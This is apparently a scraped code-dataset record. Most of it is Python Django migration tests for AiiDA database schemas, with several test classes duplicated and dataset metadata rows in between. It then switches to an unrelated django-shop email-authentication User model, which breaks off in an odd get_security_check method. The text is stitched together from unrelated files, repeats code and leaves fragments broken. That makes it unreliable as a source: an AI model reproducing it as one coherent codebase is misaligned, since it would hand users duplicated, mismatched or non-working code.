'the 0023 schema version.'.format(log_dbnode_id, log_entry.objpk)
)
self.assertEqual(
node_type, log_entry.objname,
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version.'.format(node_type, log_entry.objname)
)
self.assertEqual(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk'],
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version stored in the metadata.'.format(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk']
)
)
self.assertEqual(
node_type,
json.loads(log_entry.metadata)['objname'],
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version stored in the metadata.'.format(
node_type,
json.loads(log_entry.metadata)['objname']
)
)
class TestDataMoveWithinNodeMigration(TestMigrations):
"""
    This test class checks that the data migration 0025_move_data_within_node_module works as expected.
"""
migrate_from = '0024_dblog_update'
migrate_to = '0025_move_data_within_node_module'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_type_string(self):
"""Verify that type string of the Data node was successfully adapted."""
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'node.data.int.Int.')
self.assertEqual(node_calc.type, 'node.process.calculation.calcjob.CalcJobNode.')
class TestTrajectoryDataMigration(TestMigrationsModelModifierV0025):
"""
This test class checks that the migrations 0026_trajectory_symbols_to_attribute and
0027_delete_trajectory_symbols_array work as expected.
These are data migrations for `TrajectoryData` nodes where symbol lists are moved
from repository array to attributes.
"""
migrate_from = '0025_move_data_within_node_module'
migrate_to = '0027_delete_trajectory_symbols_array'
stepids = numpy.array([60, 70])
times = stepids * 0.01
positions = numpy.array([[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]],
[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]]])
velocities = numpy.array([[[0., 0., 0.], [0., 0., 0.], [0., 0., 0.]],
[[0.5, 0.5, 0.5], [0.5, 0.5, 0.5], [-0.5, -0.5, -0.5]]])
cells = numpy.array([[[2., 0., 0.], [0., 2., 0.], [0., 0., 2.]], [[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
def setUpBeforeMigration(self):
symbols = numpy.array(['H', 'O', 'C'])
self.node = self.DbNode(type='node.data.array.trajectory.TrajectoryData.', user_id=self.default_user.id)
self.node.save()
self.set_node_array(self.node, 'steps', self.stepids)
self.set_node_array(self.node, 'cells', self.cells)
self.set_node_array(self.node, 'symbols', symbols)
self.set_node_array(self.node, 'positions', self.positions)
self.set_node_array(self.node, 'times', self.times)
self.set_node_array(self.node, 'velocities', self.velocities)
def test_trajectory_symbols(self):
""" Check that the trajectories are migrated correctly """
node = self.load_node(self.node.id)
self.assertSequenceEqual(self.get_attribute(node, 'symbols'), ['H', 'O', 'C'])
self.assertSequenceEqual(self.get_node_array(node, 'velocities').tolist(), self.velocities.tolist())
self.assertSequenceEqual(self.get_node_array(node, 'positions').tolist(), self.positions.tolist())
with self.assertRaises(IOError):
self.get_node_array(node, 'symbols')
class TestNodePrefixRemovalMigration(TestMigrations):
"""
This test class checks that the migration 0028_remove_node_prefix works as expected.
That is the final data migration for `Nodes` after `aiida.orm.nodes` reorganization
was finalized to remove the `node.` prefix
"""
migrate_from = '0027_delete_trajectory_symbols_array'
migrate_to = '0028_remove_node_prefix'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='node.data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_node_type_string(self):
"""Verify that type string of the nodes was successfully adapted."""
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'data.int.Int.')
self.assertEqual(node_calc.type, 'process.calculation.calcjob.CalcJobNode.')
class TestParameterDataToDictMigration(TestMigrations):
"""
This test class checks that the migration 0029_rename_parameter_data_to_dict works as expected.
This is a data migration for the renaming of `ParameterData` to `Dict`.
"""
migrate_from = '0028_remove_node_prefix'
migrate_to = '0029_rename_parameter_data_to_dict'
def setUpBeforeMigration(self):
self.node = self.DbNode(type='data.parameter.ParameterData.', user_id=self.default_user.id)
self.node.save()
def test_data_node_type_string(self):
"""Verify that type string of the nodes was successfully adapted."""
node = self.load_node(self.node.id)
self.assertEqual(node.type, 'data.dict.Dict.')
class TestTextFieldToJSONFieldMigration(TestMigrations): # pylint: disable=too-many-instance-attributes
"""
This test class checks that the migration 0033_replace_text_field_with_json_field works as expected.
That migration replaces the use of text fields to store JSON data with builtin JSONFields.
"""
migrate_from = '0032_remove_legacy_workflows'
migrate_to = '0033_replace_text_field_with_json_field'
def setUpBeforeMigration(self):
from aiida.common import json
self.DbNode = self.apps.get_model('db', 'DbNode')
self.DbComputer = self.apps.get_model('db', 'DbComputer')
self.DbAuthInfo = self.apps.get_model('db', 'DbAuthInfo')
self.DbLog = self.apps.get_model('db', 'DbLog')
self.node = self.DbNode(node_type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
self.node.save()
self.computer_metadata = {
'shebang': '#!/bin/bash',
'workdir': '/scratch/',
'append_text': '',
'prepend_text': '',
'mpirun_command': ['mpirun', '-np', '{tot_num_mpiprocs}'],
'default_mpiprocs_per_machine': 1
}
self.computer_kwargs = {
'name': 'localhost_testing',
'hostname': 'localhost',
'transport_type': 'local',
'scheduler_type': 'direct',
'metadata': json.dumps(self.computer_metadata),
}
self.computer = self.DbComputer(**self.computer_kwargs)
self.computer.save()
self.auth_info_auth_params = {'safe_interval': 2}
self.auth_info_metadata = {'safe_interval': 2}
self.auth_info_kwargs = {
'aiidauser_id': self.default_user.pk,
'dbcomputer': self.computer,
'auth_params': json.dumps(self.auth_info_auth_params),
'metadata': json.dumps(self.auth_info_metadata),
}
self.auth_info = self.DbAuthInfo(**self.auth_info_kwargs)
self.auth_info.save()
self.log_metadata = {
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
}
self.log_kwargs = {
'loggername': 'localhost',
'levelname': 'localhost',
'dbnode_id': self.node.id,
'metadata': json.dumps(self.log_metadata)
}
self.log = self.DbLog(**self.log_kwargs)
self.log.save()
def test_text_field_to_json_field_migration(self):
"""Verify that the values in the text fields were maintained after migrating the field to JSONField."""
# Reload the objects to make sure the new data is loaded
computer = self.DbComputer.objects.get(pk=self.computer.id)
auth_info = self.DbAuthInfo.objects.get(pk=self.auth_info.id)
log = self.DbLog.objects.get(pk=self.log.id)
# Make sure that the migrated data matches the original
self.assertDictEqual(computer.metadata, self.computer_metadata)
self.assertDictEqual(auth_info.metadata, self.auth_info_metadata)
self.assertDictEqual(auth_info.auth_params, self.auth_info_auth_params)
self.assertDictEqual(log.metadata, self.log_metadata)
class TestResetHash(TestMigrations):
"""
This test class checks that only the hash extra is removed.
"""
migrate_from = '0038_data_migration_legacy_job_calculations'
migrate_to = '0039_reset_hash'
def setUpBeforeMigration(self):
self.node = self.DbNode(
node_type='process.calculation.calcjob.CalcJobNode.',
user_id=self.default_user.id,
extras={
'something': 123,
'_aiida_hash': 'abcd'
}
)
self.node.save()
def test_data_migrated(self):
"""Verify that type string of the nodes was successfully adapted."""
node = self.load_node(self.node.id)
extras = node.extras
self.assertEqual(extras.get('something'), 123) # Other extras should be untouched
self.assertNotIn('_aiida_hash', extras) # The hash extra should have been removed
| 44.653207
| 120
| 0.655088
|
g_update(self):
DbGroup = self.apps.get_model('db', 'DbGroup')
group_user = DbGroup.objects.get(pk=self.group_user_pk)
self.assertEqual(group_user.type_string, 'user')
group_data_upf = DbGroup.objects.get(pk=self.group_data_upf_pk)
self.assertEqual(group_data_upf.type_string, 'data.upf')
group_autoimport = DbGroup.objects.get(pk=self.group_autoimport_pk)
self.assertEqual(group_autoimport.type_string, 'auto.import')
group_autorun = DbGroup.objects.get(pk=self.group_autorun_pk)
self.assertEqual(group_autorun.type_string, 'auto.run')
class TestCalcAttributeKeysMigration(TestMigrationsModelModifierV0025):
migrate_from = '0022_dbgroup_type_string_change_content'
migrate_to = '0023_calc_job_option_attribute_keys'
KEY_RESOURCES_OLD = 'jobresource_params'
KEY_RESOURCES_NEW = 'resources'
KEY_PARSER_NAME_OLD = 'parser'
KEY_PARSER_NAME_NEW = 'parser_name'
KEY_PROCESS_LABEL_OLD = '_process_label'
KEY_PROCESS_LABEL_NEW = 'process_label'
KEY_ENVIRONMENT_VARIABLES_OLD = 'custom_environment_variables'
KEY_ENVIRONMENT_VARIABLES_NEW = 'environment_variables'
def setUpBeforeMigration(self):
self.process_label = 'TestLabel'
self.resources = {'number_machines': 1}
self.environment_variables = {}
self.parser_name = 'aiida.parsers:parser'
self.node_work = self.DbNode(type='node.process.workflow.WorkflowNode.', user_id=self.default_user.id)
self.node_work.save()
self.set_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_calc.save()
self.set_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_calc, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, self.parser_name)
self.node_other = self.DbNode(type='node.othernode.', user_id=self.default_user.id)
self.node_other.save()
self.set_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD, self.process_label)
self.set_attribute(self.node_other, self.KEY_RESOURCES_OLD, self.resources)
self.set_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD, self.environment_variables)
self.set_attribute(self.node_other, self.KEY_PARSER_NAME_OLD, self.parser_name)
def test_attribute_key_changes(self):
NOT_FOUND = tuple([0])
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_work, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_NEW), self.process_label)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_NEW), self.resources)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_NEW), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_NEW), self.parser_name)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PROCESS_LABEL_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_RESOURCES_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_calc, self.KEY_ENVIRONMENT_VARIABLES_OLD, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_calc, self.KEY_PARSER_NAME_OLD, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_OLD), self.process_label)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_OLD), self.resources)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_OLD), self.environment_variables
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_OLD), self.parser_name)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PROCESS_LABEL_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_RESOURCES_NEW, default=NOT_FOUND), NOT_FOUND)
self.assertEqual(
self.get_attribute(self.node_other, self.KEY_ENVIRONMENT_VARIABLES_NEW, default=NOT_FOUND), NOT_FOUND
)
self.assertEqual(self.get_attribute(self.node_other, self.KEY_PARSER_NAME_NEW, default=NOT_FOUND), NOT_FOUND)
class TestDbLogMigrationRecordCleaning(TestMigrations):
migrate_from = '0023_calc_job_option_attribute_keys'
migrate_to = '0024_dblog_update'
def setUpBeforeMigration(self):
import json
import importlib
from aiida.backends.general.migrations.utils import dumps_json
update_024 = importlib.import_module('aiida.backends.djsite.db.migrations.0024_dblog_update')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
calc_1 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
param = DbNode(type='data.dict.Dict.', user_id=self.default_user.id)
leg_workf = DbWorkflow(label='Legacy WorkflowNode', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
calc_1.save()
param.save()
leg_workf.save()
calc_2.save()
log_1 = DbLog(
loggername='CalculationNode logger',
objpk=calc_1.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_1.pk,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_2 = DbLog(
loggername='something.else logger',
objpk=param.pk,
objname='something.else.',
message='parameter data with log message'
)
log_3 = DbLog(
loggername='TopologicalWorkflow logger',
objpk=leg_workf.pk,
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow',
message='parameter data with log message'
)
log_4 = DbLog(
loggername='CalculationNode logger',
objpk=calc_2.pk,
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'objpk': calc_2.pk,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_5 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1000),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 1000',
metadata=json.dumps({
'msecs': 718,
'objpk': (calc_2.pk + 1000),
'lineno': 361,
'levelno': 25,
'message': 'calculation node 1000',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
log_6 = DbLog(
loggername='CalculationNode logger',
objpk=(calc_2.pk + 1001),
objname='node.calculation.job.quantumespresso.pw.',
message='calculation node 10001',
metadata=json.dumps({
'msecs': 722,
'objpk': (calc_2.pk + 1001),
'lineno': 362,
'levelno': 24,
'message': 'calculation node 1001',
'objname': 'node.calculation.job.quantumespresso.pw.',
})
)
# Storing the log records
log_1.save()
log_2.save()
log_3.save()
log_4.save()
log_5.save()
log_6.save()
# Storing temporarily information needed for the check at the test
self.to_check = dict()
# Keeping calculation & calculation log ids
self.to_check['CalculationNode'] = (
calc_1.pk,
log_1.pk,
calc_2.pk,
log_4.pk,
)
# Getting the serialized Dict logs
param_data = DbLog.objects.filter(objpk=param.pk).filter(objname='something.else.'
).values(*update_024.values_to_export)[:1]
serialized_param_data = dumps_json(list(param_data))
        # Getting the serialized logs for the unknown entity logs (as the export migration function
        # provides them) - this should coincide with the above
serialized_unknown_exp_logs = update_024.get_serialized_unknown_entity_logs(self.schema_editor)
# Getting their number
unknown_exp_logs_number = update_024.get_unknown_entity_log_number(self.schema_editor)
self.to_check['Dict'] = (serialized_param_data, serialized_unknown_exp_logs, unknown_exp_logs_number)
# Getting the serialized legacy workflow logs
leg_wf = DbLog.objects.filter(objpk=leg_workf.pk).filter(
objname='aiida.workflows.user.topologicalworkflows.topo.TopologicalWorkflow'
).values(*update_024.values_to_export)[:1]
serialized_leg_wf_logs = dumps_json(list(leg_wf))
# Getting the serialized logs for the legacy workflow logs (as the export migration function
        # provides them) - this should coincide with the above
serialized_leg_wf_exp_logs = update_024.get_serialized_legacy_workflow_logs(self.schema_editor)
        leg_wf_exp_logs_number = update_024.get_legacy_workflow_log_number(self.schema_editor)
        self.to_check['WorkflowNode'] = (serialized_leg_wf_logs, serialized_leg_wf_exp_logs, leg_wf_exp_logs_number)
# Getting the serialized logs that don't correspond to a DbNode record
logs_no_node = DbLog.objects.filter(id__in=[log_5.id, log_6.id]).values(*update_024.values_to_export)
serialized_logs_no_node = dumps_json(list(logs_no_node))
        # Getting the serialized logs with no node (as the export migration function
        # provides them) - this should coincide with the above
serialized_logs_exp_no_node = update_024.get_serialized_logs_with_no_nodes(self.schema_editor)
logs_no_node_number = update_024.get_logs_with_no_nodes_number(self.schema_editor)
self.to_check['NoNode'] = (serialized_logs_no_node, serialized_logs_exp_no_node, logs_no_node_number)
def tearDown(self):
DbUser = self.apps.get_model('db', 'DbUser')
DbNode = self.apps.get_model('db', 'DbNode')
DbWorkflow = self.apps.get_model('db', 'DbWorkflow')
DbLog = self.apps.get_model('db', 'DbLog')
DbLog.objects.all().delete()
DbNode.objects.all().delete() # pylint: disable=no-member
DbWorkflow.objects.all().delete() # pylint: disable=no-member
DbUser.objects.all().delete() # pylint: disable=no-member
super().tearDown()
def test_dblog_calculation_node(self):
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist
self.assertEqual(DbLog.objects.count(), 2, 'There should be two log records left')
# Get the node id of the log record referencing the node and verify that it is the correct one
dbnode_id_1 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][1]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_1, self.to_check['CalculationNode'][0], 'referenced node is not the expected one')
dbnode_id_2 = DbLog.objects.filter(pk=self.to_check['CalculationNode'][3]
).values('dbnode_id')[:1].get()['dbnode_id']
self.assertEqual(dbnode_id_2, self.to_check['CalculationNode'][2], 'referenced node is not the expected one')
def test_dblog_correct_export_of_logs(self):
import json
self.assertEqual(self.to_check['Dict'][0], self.to_check['Dict'][1])
self.assertEqual(self.to_check['Dict'][2], 1)
self.assertEqual(self.to_check['WorkflowNode'][0], self.to_check['WorkflowNode'][1])
self.assertEqual(self.to_check['WorkflowNode'][2], 1)
self.assertEqual(
sorted(list(json.loads(self.to_check['NoNode'][0])), key=lambda k: k['id']),
sorted(list(json.loads(self.to_check['NoNode'][1])), key=lambda k: k['id'])
)
self.assertEqual(self.to_check['NoNode'][2], 2)
def test_dblog_unique_uuids(self):
DbLog = self.apps.get_model('db', 'DbLog')
l_uuids = list(_['uuid'] for _ in DbLog.objects.values('uuid'))
s_uuids = set(l_uuids)
self.assertEqual(len(l_uuids), len(s_uuids), 'The UUIDs are not all unique.')
def test_metadata_correctness(self):
import json
DbLog = self.apps.get_model('db', 'DbLog')
metadata = list(json.loads(_['metadata']) for _ in DbLog.objects.values('metadata'))
# Verify that the objpk and objname are no longer part of the metadata
for m_res in metadata:
self.assertNotIn('objpk', m_res.keys(), 'objpk should not exist any more in metadata')
self.assertNotIn('objname', m_res.keys(), 'objname should not exist any more in metadata')
class TestDbLogMigrationBackward(TestMigrations):
migrate_from = '0024_dblog_update'
migrate_to = '0023_calc_job_option_attribute_keys'
def setUpBeforeMigration(self):
import json
DbNode = self.apps.get_model('db', 'DbNode')
DbLog = self.apps.get_model('db', 'DbLog')
# Creating the needed nodes & workflows
calc_1 = DbNode(type='node.process.calculation.CalculationNode.1', user_id=self.default_user.id)
calc_2 = DbNode(type='node.process.calculation.CalculationNode.2', user_id=self.default_user.id)
# Storing them
calc_1.save()
calc_2.save()
# Creating the corresponding log records and storing them
log_1 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_1.pk,
message='calculation node 1',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
})
)
log_2 = DbLog(
loggername='CalculationNode logger',
dbnode_id=calc_2.pk,
message='calculation node 2',
metadata=json.dumps({
'msecs': 719.0849781036377,
'lineno': 360,
'levelno': 23,
'message': 'calculation node 1',
})
)
# Storing the log records
log_1.save()
log_2.save()
# Keeping what is needed to be verified at the test
self.to_check = dict()
self.to_check[log_1.pk] = (log_1.dbnode_id, calc_1.type)
self.to_check[log_2.pk] = (log_2.dbnode_id, calc_2.type)
def test_objpk_objname(self):
import json
DbLog = self.apps.get_model('db', 'DbLog')
# Check that only two log records exist with the correct objpk objname
for log_pk, to_check_value in self.to_check.items():
log_entry = DbLog.objects.filter(pk=log_pk)[:1].get()
log_dbnode_id, node_type = to_check_value
self.assertEqual(
log_dbnode_id, log_entry.objpk,
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version.'.format(log_dbnode_id, log_entry.objpk)
)
self.assertEqual(
node_type, log_entry.objname,
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version.'.format(node_type, log_entry.objname)
)
self.assertEqual(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk'],
'The dbnode_id ({}) of the 0024 schema version should be identical to the objpk ({}) of '
'the 0023 schema version stored in the metadata.'.format(
log_dbnode_id,
json.loads(log_entry.metadata)['objpk']
)
)
self.assertEqual(
node_type,
json.loads(log_entry.metadata)['objname'],
'The type ({}) of the linked node of the 0024 schema version should be identical to the '
'objname ({}) of the 0023 schema version stored in the metadata.'.format(
node_type,
json.loads(log_entry.metadata)['objname']
)
)
class TestDataMoveWithinNodeMigration(TestMigrations):
migrate_from = '0024_dblog_update'
migrate_to = '0025_move_data_within_node_module'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_type_string(self):
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'node.data.int.Int.')
self.assertEqual(node_calc.type, 'node.process.calculation.calcjob.CalcJobNode.')
class TestTrajectoryDataMigration(TestMigrationsModelModifierV0025):
migrate_from = '0025_move_data_within_node_module'
migrate_to = '0027_delete_trajectory_symbols_array'
stepids = numpy.array([60, 70])
times = stepids * 0.01
positions = numpy.array([[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]],
[[0., 0., 0.], [0.5, 0.5, 0.5], [1.5, 1.5, 1.5]]])
velocities = numpy.array([[[0., 0., 0.], [0., 0., 0.], [0., 0., 0.]],
[[0.5, 0.5, 0.5], [0.5, 0.5, 0.5], [-0.5, -0.5, -0.5]]])
cells = numpy.array([[[2., 0., 0.], [0., 2., 0.], [0., 0., 2.]], [[3., 0., 0.], [0., 3., 0.], [0., 0., 3.]]])
def setUpBeforeMigration(self):
symbols = numpy.array(['H', 'O', 'C'])
self.node = self.DbNode(type='node.data.array.trajectory.TrajectoryData.', user_id=self.default_user.id)
self.node.save()
self.set_node_array(self.node, 'steps', self.stepids)
self.set_node_array(self.node, 'cells', self.cells)
self.set_node_array(self.node, 'symbols', symbols)
self.set_node_array(self.node, 'positions', self.positions)
self.set_node_array(self.node, 'times', self.times)
self.set_node_array(self.node, 'velocities', self.velocities)
def test_trajectory_symbols(self):
node = self.load_node(self.node.id)
self.assertSequenceEqual(self.get_attribute(node, 'symbols'), ['H', 'O', 'C'])
self.assertSequenceEqual(self.get_node_array(node, 'velocities').tolist(), self.velocities.tolist())
self.assertSequenceEqual(self.get_node_array(node, 'positions').tolist(), self.positions.tolist())
with self.assertRaises(IOError):
self.get_node_array(node, 'symbols')
class TestNodePrefixRemovalMigration(TestMigrations):
migrate_from = '0027_delete_trajectory_symbols_array'
migrate_to = '0028_remove_node_prefix'
def setUpBeforeMigration(self):
self.node_calc = self.DbNode(type='node.process.calculation.calcjob.CalcJobNode.', user_id=self.default_user.id)
self.node_data = self.DbNode(type='node.data.int.Int.', user_id=self.default_user.id)
self.node_calc.save()
self.node_data.save()
def test_data_node_type_string(self):
node_calc = self.load_node(self.node_calc.id)
node_data = self.load_node(self.node_data.id)
self.assertEqual(node_data.type, 'data.int.Int.')
self.assertEqual(node_calc.type, 'process.calculation.calcjob.CalcJobNode.')
class TestParameterDataToDictMigration(TestMigrations):
migrate_from = '0028_remove_node_prefix'
migrate_to = '0029_rename_parameter_data_to_dict'
def setUpBeforeMigration(self):
self.node = self.DbNode(type='data.parameter.ParameterData.', user_id=self.default_user.id)
self.node.save()
def test_data_node_type_string(self):
node = self.load_node(self.node.id)
self.assertEqual(node.type, 'data.dict.Dict.')
class TestTextFieldToJSONFieldMigration(TestMigrations): # pylint: disable=too-many-instance-attributes
migrate_from = '0032_remove_legacy_workflows'
migrate_to = '0033_replace_text_field_with_json_field'
def setUpBeforeMigration(self):
from aiida.common import json
self.DbNode = self.apps.get_model('db', 'DbNode')
self.DbComputer = self.apps.get_model('db', 'DbComputer')
self.DbAuthInfo = self.apps.get_model('db', 'DbAuthInfo')
self.DbLog = self.apps.get_model('db', 'DbLog')
self.node = self.DbNode(node_type='node.process.calculation.CalculationNode.', user_id=self.default_user.id)
self.node.save()
self.computer_metadata = {
            'shebang': '#!/bin/bash',
'workdir': '/scratch/',
'append_text': '',
'prepend_text': '',
'mpirun_command': ['mpirun', '-np', '{tot_num_mpiprocs}'],
'default_mpiprocs_per_machine': 1
}
self.computer_kwargs = {
'name': 'localhost_testing',
'hostname': 'localhost',
'transport_type': 'local',
'scheduler_type': 'direct',
'metadata': json.dumps(self.computer_metadata),
}
self.computer = self.DbComputer(**self.computer_kwargs)
self.computer.save()
self.auth_info_auth_params = {'safe_interval': 2}
self.auth_info_metadata = {'safe_interval': 2}
self.auth_info_kwargs = {
'aiidauser_id': self.default_user.pk,
'dbcomputer': self.computer,
'auth_params': json.dumps(self.auth_info_auth_params),
'metadata': json.dumps(self.auth_info_metadata),
}
self.auth_info = self.DbAuthInfo(**self.auth_info_kwargs)
self.auth_info.save()
self.log_metadata = {
'msecs': 719.0849781036377,
'lineno': 350,
'thread': 140011612940032,
'asctime': '10/21/2018 12:39:51 PM',
'created': 1540118391.719085,
'levelno': 23,
'message': 'calculation node 1',
}
self.log_kwargs = {
'loggername': 'localhost',
'levelname': 'localhost',
'dbnode_id': self.node.id,
'metadata': json.dumps(self.log_metadata)
}
self.log = self.DbLog(**self.log_kwargs)
self.log.save()
def test_text_field_to_json_field_migration(self):
# Reload the objects to make sure the new data is loaded
computer = self.DbComputer.objects.get(pk=self.computer.id)
auth_info = self.DbAuthInfo.objects.get(pk=self.auth_info.id)
log = self.DbLog.objects.get(pk=self.log.id)
# Make sure that the migrated data matches the original
self.assertDictEqual(computer.metadata, self.computer_metadata)
self.assertDictEqual(auth_info.metadata, self.auth_info_metadata)
self.assertDictEqual(auth_info.auth_params, self.auth_info_auth_params)
self.assertDictEqual(log.metadata, self.log_metadata)
class TestResetHash(TestMigrations):
migrate_from = '0038_data_migration_legacy_job_calculations'
migrate_to = '0039_reset_hash'
def setUpBeforeMigration(self):
self.node = self.DbNode(
node_type='process.calculation.calcjob.CalcJobNode.',
user_id=self.default_user.id,
extras={
'something': 123,
'_aiida_hash': 'abcd'
}
)
self.node.save()
def test_data_migrated(self):
node = self.load_node(self.node.id)
extras = node.extras
self.assertEqual(extras.get('something'), 123) # Other extras should be untouched
self.assertNotIn('_aiida_hash', extras) # The hash extra should have been removed
| true
| true
|
1c4478138375cda3bf6bd2ae41a6f112bb318389
| 3,278
|
py
|
Python
|
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | null | null | null |
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | null | null | null |
email_auth/models.py
|
vaibhavantil2/django-shop
|
10d82a0ae9096f501b90ad9fd585a378c789ee51
|
[
"BSD-3-Clause"
] | 3
|
2021-11-16T12:28:49.000Z
|
2021-12-22T06:55:30.000Z
|
"""
Alternative implementation of Django's authentication User model, which allows authenticating
against the email field in addition to the username field.
This alternative implementation is activated by setting ``AUTH_USER_MODEL = 'shop.User'`` in
settings.py; otherwise the default Django or another customized implementation will be used.
"""
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AbstractUser, UserManager as BaseUserManager
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
class UserManager(BaseUserManager):
def get_by_natural_key(self, username):
try:
return self.get(username=username)
except self.model.DoesNotExist:
return self.get(is_active=True, email=username)
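        # Django's ModelBackend resolves the login name through this method, so the
        # effect is (sketch, hypothetical credentials):
        #
        #     from django.contrib.auth import authenticate
        #     user = authenticate(username='customer@example.com', password='secret')
        #     # falls back to the active user with that email if no username matches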
class User(AbstractUser):
"""
    Alternative implementation of Django's User model allowing authentication against the email
    field in addition to the username field, which remains the primary unique identifier. The
    email field is only used in addition. For users marked as active, their email address must
    be unique. Guests can reuse their email address as often as they want.
"""
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['username']
class Meta:
db_table = 'auth_user'
verbose_name = _("Customer")
verbose_name_plural = _("Customers")
swappable = 'AUTH_USER_MODEL'
def get_username(self):
return self.email
def __str__(self):
if self.is_staff or self.is_superuser:
return self.username
return self.email or '<anonymous>'
def get_full_name(self):
full_name = super(User, self).get_full_name()
if full_name:
return full_name
return self.get_short_name()
def get_short_name(self):
short_name = super(User, self).get_short_name()
if short_name:
return short_name
return self.email
    def get_security_check(self):
        # ``mother_name``/``mother`` are not standard ``AbstractUser`` attributes; they
